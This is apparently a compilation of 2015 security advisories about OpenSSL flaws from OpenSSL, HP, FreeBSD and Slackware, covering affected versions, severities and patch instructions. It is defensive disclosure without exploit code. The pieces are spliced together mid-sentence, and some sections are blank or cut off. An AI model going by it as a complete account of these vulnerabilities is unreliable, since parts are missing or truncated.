upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Emilia K\u00e4sper and a fix developed by\nStephen Henson of the OpenSSL development team. \n\nPKCS7 NULL pointer dereferences (CVE-2015-0289)\n===============================================\n\nSeverity: Moderate\n\nThe PKCS#7 parsing code does not handle missing outer ContentInfo correctly. \nAn attacker can craft malformed ASN.1-encoded PKCS#7 blobs with\nmissing content and trigger a NULL pointer dereference on parsing. \n\nApplications that verify PKCS#7 signatures, decrypt PKCS#7 data or\notherwise parse PKCS#7 structures from untrusted sources are\naffected. OpenSSL clients and servers are not affected. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0\nand 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was reported to OpenSSL on February 16th 2015 by Michal\nZalewski (Google) and a fix developed by Emilia K\u00e4sper of the OpenSSL\ndevelopment team. \n\nBase64 decode (CVE-2015-0292)\n=============================\n\nSeverity: Moderate\n\nA vulnerability existed in previous versions of OpenSSL related to the\nprocessing of base64 encoded data. Any code path that reads base64 data from an\nuntrusted source could be affected (such as the PEM processing routines). \nMaliciously crafted base 64 data could trigger a segmenation fault or memory\ncorruption. This was addressed in previous versions of OpenSSL but has not been\nincluded in any security advisory until now. \n\nThis issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 0.9.8 users should upgrade to 0.9.8za. \n\nThe fix for this issue can be identified by commits d0666f289a (1.0.1),\n84fe686173 (1.0.0) and 9febee0272 (0.9.8). This issue was originally reported by\nRobert Dugal and subsequently by David Ramos. \n\nDoS via reachable assert in SSLv2 servers (CVE-2015-0293)\n=========================================================\n\nSeverity: Moderate\n\nA malicious client can trigger an OPENSSL_assert (i.e., an abort) in\nservers that both support SSLv2 and enable export cipher suites by sending\na specially crafted SSLv2 CLIENT-MASTER-KEY message. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0\nand 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Sean Burford (Google) and Emilia K\u00e4sper\n(OpenSSL development team) in March 2015 and the fix was developed by\nEmilia K\u00e4sper. \n\nEmpty CKE with client auth and DHE (CVE-2015-1787)\n==================================================\n\nSeverity: Moderate\n\nIf client auth is used then a server can seg fault in the event of a DHE\nciphersuite being selected and a zero length ClientKeyExchange message being\nsent by the client. This could be exploited in a DoS attack. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was discovered and the fix was developed by Matt Caswell of the\nOpenSSL development team. \n\nHandshake with unseeded PRNG (CVE-2015-0285)\n============================================\n\nSeverity: Low\n\nUnder certain conditions an OpenSSL 1.0.2 client can complete a handshake with\nan unseeded PRNG. The conditions are:\n- The client is on a platform where the PRNG has not been seeded automatically,\nand the user has not seeded manually\n- A protocol specific client method version has been used (i.e. not\nSSL_client_methodv23)\n- A ciphersuite is used that does not require additional random data from the\nPRNG beyond the initial ClientHello client random (e.g. PSK-RC4-SHA). \n\nIf the handshake succeeds then the client random that has been used will have\nbeen generated from a PRNG with insufficient entropy and therefore the output\nmay be predictable. \n\nFor example using the following command with an unseeded openssl will succeed on\nan unpatched platform:\n\nopenssl s_client -psk 1a2b3c4d -tls1_2 -cipher PSK-RC4-SHA\n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was discovered and the fix was developed by Matt Caswell of the\nOpenSSL development team. \n\nUse After Free following d2i_ECPrivatekey error (CVE-2015-0209)\n===============================================================\n\nSeverity: Low\n\nA malformed EC private key file consumed via the d2i_ECPrivateKey function could\ncause a use after free condition. This, in turn, could cause a double\nfree in several private key parsing functions (such as d2i_PrivateKey\nor EVP_PKCS82PKEY) and could lead to a DoS attack or memory corruption\nfor applications that receive EC private keys from untrusted\nsources. This scenario is considered rare. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by the BoringSSL project and fixed in their commit\n517073cd4b. The OpenSSL fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nX509_to_X509_REQ NULL pointer deref (CVE-2015-0288)\n===================================================\n\nSeverity: Low\n\nThe function X509_to_X509_REQ will crash with a NULL pointer dereference if\nthe certificate key is invalid. This function is rarely used in practice. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0\nand 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Brian Carpenter and a fix developed by Stephen\nHenson of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nreleases will be provided after that date. Users of these releases are advised\nto upgrade. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20150319.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n. \n\nRelease Date: 2015-08-24\nLast Updated: 2015-08-24\n\nPotential Security Impact: Remote unauthorized modification, unauthorized\naccess, or unauthorized disclosure of information. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Matrix\nOperating Environment. The vulnerabilities could be exploited remotely\nresulting in unauthorized modification, unauthorized access, or unauthorized\ndisclosure of information. \n\nReferences:\n\nCVE-2010-5107\nCVE-2013-0248\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-1692\nCVE-2014-3523\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8142\nCVE-2014-8275\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9653\nCVE-2014-9705\nCVE-2015-0204\nCVE-2015-0205\nCVE-2015-0206\nCVE-2015-0207\nCVE-2015-0208\nCVE-2015-0209\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0273\nCVE-2015-0285\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0290\nCVE-2015-0291\nCVE-2015-0292\nCVE-2015-0293\nCVE-2015-1787\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-2134\nCVE-2015-2139\nCVE-2015-2140\nCVE-2015-2301\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2787\nCVE-2015-3113\nCVE-2015-5122\nCVE-2015-5123\nCVE-2015-5402\nCVE-2015-5403\nCVE-2015-5404\nCVE-2015-5405\nCVE-2015-5427\nCVE-2015-5428\nCVE-2015-5429\nCVE-2015-5430\nCVE-2015-5431\nCVE-2015-5432\nCVE-2015-5433\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Matrix Operating Environment impacted software components and versions:\n\nHP Systems Insight Manager (SIM) prior to version 7.5.0\nHP System Management Homepage (SMH) prior to version 7.5.0\nHP Version Control Agent (VCA) prior to version 7.5.0\nHP Version Control Repository Manager (VCRM) prior to version 7.5.0\nHP Insight Orchestration prior to version 7.5.0\nHP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9\nCVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities in the impacted versions of HP Matrix Operating Environment\n\nHP Matrix Operating Environment 7.5.0 is only available on DVD. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. \n\nHP Matrix Operating Environment component\n HP Security Bulletin Number\n Security Bulletin Location\n\nHP Systems Insight Manager (SIM)\n HPSBMU03394\n HPSBMU03394\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744\n\nHP System Management Homepage (SMH)\n HPSBMU03380\n http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490\u0026la\nng=en-us\u0026cc=\n\nHP Version Control Agent (VCA)\n HPSBMU03397\n https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169\n\nHP Version Control Repository Manager (VCRM)\n HPSBMU03396\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04765115\n\nHP Virtual Connect Enterprise Manager (VCEM) SDK\n HPSBMU03413\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04774021\n\nHISTORY\nVersion:1 (rev.1) - 24 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nReferences:\n\nCVE-2014-0118 - Remote Denial of Service (DoS)\nCVE-2014-0226 - Remote Denial of Service (DoS)\nCVE-2014-0231 - Remote Denial of Service (DoS)\nCVE-2014-3523 - Remote Denial of Service (DoS)\nCVE-2014-3569 - Remote Denial of Service (DoS)\nCVE-2014-3570 - Remote Disclosure of Information\nCVE-2014-3571 - Remote Denial of Service (DoS)\nCVE-2014-3572 - Remote Disclosure of Information\nCVE-2014-8142 - Remote Code Execution\nCVE-2014-8275 - Unauthorized Modification\nCVE-2014-9427 - Remote Disclosure of Information\nCVE-2014-9652 - Remote Denial of Service (DoS)\nCVE-2014-9653 - Remote Denial of Service (DoS)\nCVE-2014-9705 - Remote Code Execution\nCVE-2015-0204 - Remote Disclosure of Information\nCVE-2015-0205 - Remote Unauthorized Access\nCVE-2015-0206 - Remote Denial of Service (DoS)\nCVE-2015-0207 - Remote Denial of Service (DoS)\nCVE-2015-0208 - Remote Denial of Service (DoS)\nCVE-2015-0209 - Remote Denial of Service (DoS)\nCVE-2015-0231 - Remote Denial of Service (DoS)\nCVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code\nCVE-2015-0273 - Remote Execution of Arbitrary Code\nCVE-2015-0285 - Remote Disclosure of Information\nCVE-2015-0286 - Remote Denial of Service (DoS)\nCVE-2015-0287 - Remote Denial of Service (DoS)\nCVE-2015-0288 - Remote Denial of Service (DoS)\nCVE-2015-0289 - Remote Denial of Service (DoS)\nCVE-2015-0290 - Remote Denial of Service (DoS)\nCVE-2015-0291 - Remote Denial of Service (DoS)\nCVE-2015-0292 - Remote Denial of Service (DoS)\nCVE-2015-0293 - Remote Denial of Service (DoS)\nCVE-2015-1787 - Remote Denial of Service (DoS)\nCVE-2015-2301 - Remote Execution of Arbitrary Code\nCVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code\nCVE-2015-2348 - Unauthorized Modification\nCVE-2015-2787 - Remote Execution of Arbitrary Code\nCVE-2015-2134 - Cross-site Request Forgery (CSRF)\nSSRT102109\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-15:06.openssl Security Advisory\n The FreeBSD Project\n\nTopic: Multiple OpenSSL vulnerabilities\n\nCategory: contrib\nModule: openssl\nAnnounced: 2015-03-19\nAffects: All supported versions of FreeBSD. \nCorrected: 2015-03-19 17:40:43 UTC (stable/10, 10.1-STABLE)\n 2015-03-19 17:42:38 UTC (releng/10.1, 10.1-RELEASE-p7)\n 2015-03-19 17:40:43 UTC (stable/9, 9.3-STABLE)\n 2015-03-19 17:42:38 UTC (releng/9.3, 9.3-RELEASE-p11)\n 2015-03-19 17:40:43 UTC (stable/8, 8.4-STABLE)\n 2015-03-19 17:42:38 UTC (releng/8.4, 8.4-RELEASE-p25)\nCVE Name: CVE-2015-0209, CVE-2015-0286, CVE-2015-0287, CVE-2015-0288,\n CVE-2015-0289, CVE-2015-0293\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nI. Background\n\nFreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nAbstract Syntax Notation One (ASN.1) is a standard and notation that\ndescribes rules and structures for representing, encoding, transmitting,\nand decoding data in telecommunications and computer networking, which\nenables representation of objects that are independent of machine-specific\nencoding technique. \n\nII. [CVE-2015-0293]\n\nIII. [CVE-2015-0209]\n\nA remote attacker who is able to send specifically crafted certificates\nmay be able to crash an OpenSSL client or server. [CVE-2015-0287]\n\nAn attacker may be able to crash applications that create a new certificate\nrequest with subject name the same as in an existing, specifically crafted\ncertificate. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 8.4 and FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-0.9.8.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-0.9.8.patch.asc\n# gpg --verify openssl-0.9.8.patch.asc\n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-1.0.1.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-1.0.1.patch.asc\n# gpg --verify openssl-1.0.1.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r280266\nreleng/8.4/ r280268\nstable/9/ r280266\nreleng/9.3/ r280268\nstable/10/ r280266\nreleng/10.1/ r280268\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:https://www.openssl.org/news/secadv_20150319.txt\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:06.openssl.asc\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.1.2 (FreeBSD)\n\niQIcBAEBCgAGBQJVCwr1AAoJEO1n7NZdz2rnayEP/0w3Pba5k/1G0mJ1T9APNAns\nhhXm0YuR/rNJ1XBooWEOctrijlsVChcIt8KvJCU9apOZWjDvm/nvaQ077GCi5RSp\njhQBs8MLVfXzwMbJ0/uBpp6ChF8uafk5O+gr8ulb2jG6VIaLkGOWPYv61aRYSGxy\nR7+6FxD8M0lLbGOQGETy1HxKzeWztA2p0ILORNAsi+bF8GSJpxGhSxqDDi4+ic/C\n3oEw0zT/E6DhxJovOPebKq0eGcRbv7ETqDmtNQdqbOddV+0FY1E+nHtrAo6B/Kln\nrL+meBJHmLeEREROFk4OvCynuROUJGmXJGKwjN3uOVM05qcEZS4NkVhFNrxt6S5H\nt3wQ02SesbA3pbmce5OuXmlJgdL57DVlMb5sQjkqPeoJ6pn6Rz7VLSgLNfXDUSxs\nx/Lgx0+qLQUubMud7zT97UIvZmDqFTWXfJu5S/0Qt8BPFunmoNJttJ5Cr+brzEtu\n5RLjcvkC1giVCpSXS96QbeT67uqSkMZa8gtII8bA77HBGA0Ky8AOwTAXbCiUovuH\nsLwsI8KUC3lsKUh7eyLsSm2+wRHn0e6dZ1PE0JRazCnCRboTvMWK2d4R7ANdrwsq\nCgtCWLRz6vbB9J4XTNupcEoZGhIA4RuOBqx43eQmaRw1HoV3vn85QP94oL5jzXBd\nUQg3YfrXHDlxCsqEzN7o\n=wi0T\n-----END PGP SIGNATURE-----\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1m-i486-1_slack14.1.txz: Upgraded. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zf-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zf-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zf-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1m-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1m-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1m-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1m-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1m-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1m-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1m-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n9ba57b2971962ceb6205ec7b7e6b84e7 openssl-0.9.8zf-i486-1_slack13.0.txz\n706ef57bb71992961584a3d957c5dbcb openssl-solibs-0.9.8zf-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n5f581b663798eacc8e7df4c292f33dbf 